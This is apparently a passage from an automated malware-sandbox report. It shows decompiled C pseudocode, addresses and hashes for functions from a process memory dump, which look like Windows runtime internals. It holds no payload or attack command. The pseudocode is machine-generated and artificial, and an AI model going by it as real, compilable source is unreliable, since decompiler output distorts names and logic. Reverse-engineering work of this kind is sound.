Function 02B07016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02B07016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x2b7d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E02B06B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E02B06B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E02AA7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E02AC9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E02ACB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L02AA4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x02b07016
0x02b0701e
0x02b0702b
0x02b07033
0x02b07037
0x02b0703c
0x02b0703e
0x02b07041
0x02b07045
0x02b0704a
0x02b07050
0x02b07055
0x02b0705a
0x02b07062
0x02b07062
0x02b0705a
0x02b07064
0x02b07064
0x02b07067
0x02b07071
0x02b07096
0x02b0709b
0x02b070a2
0x02b070a6
0x02b070a7
0x02b070ad
0x02b070b3
0x02b070b6
0x02b070bb
0x02b070c3
0x02b070c3
0x02b070c6
0x02b070cd
0x02b070dd
0x02b070e0
0x02b070e2
0x02b070e2
0x02b070ee
0x02b07101
0x02b070f0
0x02b070f9
0x02b070f9
0x02b0710a
0x02b0710e
0x02b07112
0x02b07117
0x02b07118
0x02b07118
0x02b070bb
0x02b0711d
0x02b07123
0x02b07131
0x02b07131
0x02b07136
0x02b0713d
0x02b0713e
0x02b0713f
0x02b0714a
0x02b0714a
0x02b07084
0x02b07088
0x00000000
0x02b0708e
0x02b0708e
0x02b07092
0x00000000
0x02b07092

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880d915d334e441a137047d2f0199b04db93401b4f218cb7b392c25e04a6e16c
Instruction ID: 6ac7c4a64431c9fd493407ea013495258a65f431918f593a1a1af8bdd1dd1d59
Opcode Fuzzy Hash: 880d915d334e441a137047d2f0199b04db93401b4f218cb7b392c25e04a6e16c
Instruction Fuzzy Hash: B73193726047519BC321DF28C981A6AF7A9FF88700F044A69F895976D0EB30E914DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02AAC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02AAC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E02AA7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E02B58D34(_v8, _t80);
					}
					E02AA2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E02A9FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E02B58833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E02A9FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E02ACB180();
						if(_a4 != 0) {
							E02AA2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E02AABB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E02AABB2D(_t16, _t15);
						E02AAB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E02A9FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E02A9FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E02A9FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x02aac18d
0x02aac18f
0x02aac191
0x02aac19b
0x02aac1a0
0x02aac1d4
0x02aac1de
0x02af2d6e
0x02aac1e4
0x02aac1e4
0x02aac1e4
0x02aac1ec
0x02af2d7d
0x02af2d7d
0x02aac1f3
0x02aac1ff
0x02af2d88
0x02af2d8d
0x02af2d94
0x02af2d94
0x02af2d9f
0x02af2da4
0x02af2dab
0x02af2db0
0x02af2db2
0x02af2db3
0x02af2db4
0x02af2dbc
0x02af2dc3
0x02af2dc3
0x02aac205
0x02aac205
0x02aac208
0x02aac20e
0x02aac211
0x02aac216
0x02aac219
0x02aac21f
0x02aac222
0x02aac22c
0x02aac234
0x02aac23a
0x02aac23f
0x02aac245
0x02aac24b
0x02aac251
0x02aac25a
0x02aac276
0x02aac27d
0x02aac27d
0x02aac25c
0x02aac25c
0x00000000
0x02aac25e
0x02aac1a4
0x02aac1aa
0x02aac1b3
0x02aac265
0x02aac26c
0x02aac26c
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: a884863670966910b4b707a7c9a0589054a17bf1fee97920246e745512463e9b
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 74314B7274164ABEEB04EBB5C5A0BE9F7A6BF52314F04415BD41C87201DF386959CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ABA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E02ABA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x2b77b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x2b77b10 = 8;
					 *0x2b77b14 = 0x2b77b0c;
					 *0x2b77b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E02ABA990(0x2b77b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L02ABA840(__edx, __ecx, __ecx, _t52, 0x2b77b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x2b77b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x2b77b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x2b77b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L02AA4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x2b77b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E02ACF3E0(_t50,  *0x2b77b14, _t8 >> 3);
						_t28 =  *0x2b77b14; // 0x771c7b0c
						__eflags = _t28 - 0x2b77b0c;
						if(_t28 != 0x2b77b0c) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x2b77b14 = _t50;
						_t48 = _v12;
						 *0x2b77b10 = _t9;
						goto L6;
					}
					 *0x2b77b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x02aba713
0x02aba714
0x02aba717
0x02aba71d
0x02aba720
0x02aba722
0x02aba727
0x02aba74a
0x02aba754
0x02aba75e
0x02aba768
0x02aba76a
0x02aba773
0x02aba78b
0x02aba790
0x02aba792
0x02aba741
0x02aba741
0x02aba743
0x02aba749
0x02aba749
0x02aba732
0x02aba73a
0x02aba797
0x02aba79d
0x02aba7a3
0x02aba7a9
0x02aba7b6
0x02aba7bc
0x02aba7ca
0x02aba7e0
0x02aba7e2
0x02aba7e4
0x02af9bf2
0x00000000
0x02af9bf2
0x02aba7ed
0x02aba7f2
0x02aba800
0x02aba805
0x02aba80d
0x02aba812
0x02af9c08
0x02af9c08
0x02aba818
0x02aba81b
0x02aba821
0x02aba824
0x00000000
0x02aba824
0x02aba7ae
0x00000000
0x02aba7ae
0x02aba73c
0x02aba73e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0339c50af8aa333896f79640eaed32f3934197f03cd63ce530e069280b934f80
Instruction ID: a62c7f945ef36131ec6296a1baefba9cb50e0878246829ccc5c7df369aa33ab9
Opcode Fuzzy Hash: 0339c50af8aa333896f79640eaed32f3934197f03cd63ce530e069280b934f80
Instruction Fuzzy Hash: D831ECB1A64200EFD712CB08D8A0FAAB7F9EB84740F200D9AE015C7741EF70A954EB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A8AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E02A8AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x2b7d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x2b77b9c; // 0x0
					_t53 = L02AA4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E02ACB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E02ACF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L02A96C59(_t53, _t51, _t58) != 0) {
							_t28 = E02AB5E50(0x2a6c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E02ABB230(_v32, _v28, 0x2a6c2d8, 1,  &_v24);
								_t28 = E02A8F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x02a8aa25
0x02a8aa29
0x02a8aa2d
0x02a8aa30
0x02a8aa37
0x02a8aa3c
0x02ae4458
0x02ae4458
0x02ae4472
0x02ae4474
0x02ae4476
0x02a8aa64
0x02a8aa74
0x02ae447c
0x02ae4483
0x02ae4492
0x02a8aa52
0x02a8aa54
0x02a8aa5e
0x02ae44a8
0x02ae44ad
0x02ae44af
0x02ae44b6
0x02ae44b6
0x02ae44b9
0x02ae44bc
0x02ae44cd
0x02ae44d3
0x02ae44d6
0x02ae44e1
0x02ae44e1
0x02ae44e6
0x02ae44e8
0x02ae44fb
0x02ae44fb
0x02ae44e8
0x00000000
0x02a8aa5e
0x02ae4476
0x02a8aa42
0x02a8aa46
0x02a8aa48
0x02a8aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d31bb148db87ca13a4bfaa0e693c08a46413af5575ec980aec304869ae4a8c8
Instruction ID: 08883686acb136a1168d0f79aa63bbfaa07032862ee441b34d417330cc45ad69
Opcode Fuzzy Hash: 9d31bb148db87ca13a4bfaa0e693c08a46413af5575ec980aec304869ae4a8c8
Instruction Fuzzy Hash: 7131C571A40219ABDF15AF64CE81ABFB7BAFF08700F01446AF906E7140EF749911DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AB61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E02AB61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E02AB5E50(0x2a667cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E02B59D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E02A8F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x02ab61b3
0x02ab61b5
0x02ab61bd
0x02ab61c3
0x02ab61c7
0x02ab61d2
0x02ab61ff
0x02ab61ff
0x02ab6201
0x02ab6207
0x02ab6207
0x02ab61d4
0x02ab61d9
0x00000000
0x00000000
0x02ab61df
0x02ab61e2
0x00000000
0x00000000
0x02ab61e6
0x02ab61e8
0x02ab61ee
0x02ab61ee
0x02ab61f9
0x02af762f
0x02af7632
0x02af7635
0x02af7639
0x02af7640
0x02af766e
0x02af7675
0x00000000
0x00000000
0x02af7681
0x02af7689
0x02af768d
0x02af7691
0x02af7695
0x02af7699
0x02af76af
0x02af76b5
0x02af76b7
0x02af76b7
0x02af76d7
0x02af76dc
0x00000000
0x02af76dc
0x02af76a2
0x02af76a9
0x02af7651
0x02af7653
0x02af7653
0x02af7656
0x02af7656
0x00000000
0x02af7656
0x02af7644
0x02af7646
0x02af7648
0x02af7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e580ee16d1b310b5e930fe16a35d2d6035bd312ca2b392b8e9a1fb84aaad7076
Instruction ID: dd3ae4490f16c9d87376506a21c6dfd91a484efed1ea9387d5294492b0cc6fe1
Opcode Fuzzy Hash: e580ee16d1b310b5e930fe16a35d2d6035bd312ca2b392b8e9a1fb84aaad7076
Instruction Fuzzy Hash: C5316971A057018FD3A1CF59C980B66F7E9FF88B04F05496DF9989B252EBB4E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02AC8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02AC8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x2b7d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E02AB4E70(0x2b786e4, 0x2ac9490, 0, 0);
					if( *0x2b753e8 > 5 && E02AC8F33(0x2b753e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x2b753e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x2b753e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x2a6bc46;
						_t48 = E02B07B9C(0x2b753e8, 0x2a6bc46, _t67, 0x2b753e8, _t70,  &_v140);
					}
				}
				return E02ACB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x02ac8ec7
0x02ac8ed9
0x02ac8edc
0x02ac8ee6
0x02ac8ee9
0x02ac8eee
0x02ac8efc
0x02ac8f08
0x02b01349
0x02b01353
0x02b0135d
0x02b01366
0x02b0136f
0x02b01375
0x02b0137c
0x02b01385
0x02b01390
0x02b01391
0x02b0139c
0x02b0139d
0x02b013a6
0x02b013ac
0x02b013b2
0x02b013b5
0x02b013bc
0x02b013bf
0x02b013c2
0x02b013c5
0x02b013c8
0x02b013cb
0x02b013ce
0x02b013d1
0x02b013d4
0x02b013d7
0x02b013da
0x02b013dd
0x02b013e0
0x02b013e3
0x02b013e6
0x02b013e9
0x02b013f6
0x02b01400
0x02b01400
0x02ac8f08
0x02ac8f32

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 292dc8afd0d233f80f7bd79a01386df52df5760d5906d53bac5c26b779804a58
Instruction ID: 93df037ea758c58cbaf90208dda373044ed3c6da8d784499150b82c19db6be48
Opcode Fuzzy Hash: 292dc8afd0d233f80f7bd79a01386df52df5760d5906d53bac5c26b779804a58
Instruction Fuzzy Hash: 894172B1D002189FDB24CFAAD981AAEFBF5FB48710F5081AEE559A7240DB745A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02ABE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E02ABE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E02AC9670() < 0) {
					L02ADDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x2b77b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L02AA4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M02ABE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x02abe730
0x02abe736
0x02abe738
0x02abe73d
0x02abe73e
0x02abe740
0x02abe749
0x02abe765
0x02abe76a
0x02abe76b
0x02abe76c
0x02abe76d
0x02abe76e
0x02abe76f
0x02abe775
0x02abe777
0x02abe77e
0x02afb675
0x02abe784
0x02abe784
0x02abe789
0x02abe7a8
0x02abe7ac
0x02abe807
0x02abe7ae
0x02abe7ae
0x02abe7b1
0x02abe7b4
0x02abe7b9
0x02abe7c0
0x02abe7c4
0x02abe7ca
0x02abe7cc
0x00000000
0x02abe7d3
0x02abe7d6
0x00000000
0x00000000
0x02abe7ff
0x02abe802
0x00000000
0x00000000
0x02abe7f9
0x02abe7fc
0x00000000
0x00000000
0x02abe7f3
0x02abe7f6
0x00000000
0x00000000
0x02abe7ed
0x02abe7f0
0x00000000
0x00000000
0x02abe7e7
0x02abe7ea
0x00000000
0x00000000
0x02afb685
0x02afb688
0x00000000
0x00000000
0x02afb682
0x00000000
0x00000000
0x02abe7cc
0x02abe7d9
0x02abe7dc
0x02abe7de
0x02abe7de
0x02abe7ac
0x02abe7e4
0x02abe74b
0x02abe751
0x02abe759
0x02abe761
0x02abe761

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f867f0c222ae9f9004ff1972667463b2fbcce96c33da5144befac1b9caea5fa
Instruction ID: 10f13a96e7985926a4ca3c20256521ce23775aac1c5413ba65c4bb4dfd665d69
Opcode Fuzzy Hash: 9f867f0c222ae9f9004ff1972667463b2fbcce96c33da5144befac1b9caea5fa
Instruction Fuzzy Hash: 79318DB5A54249EFD745CF58C941B9AB7E8FF08314F148656FA04CB742DA31E890CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ABBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02ABBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x2b76100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
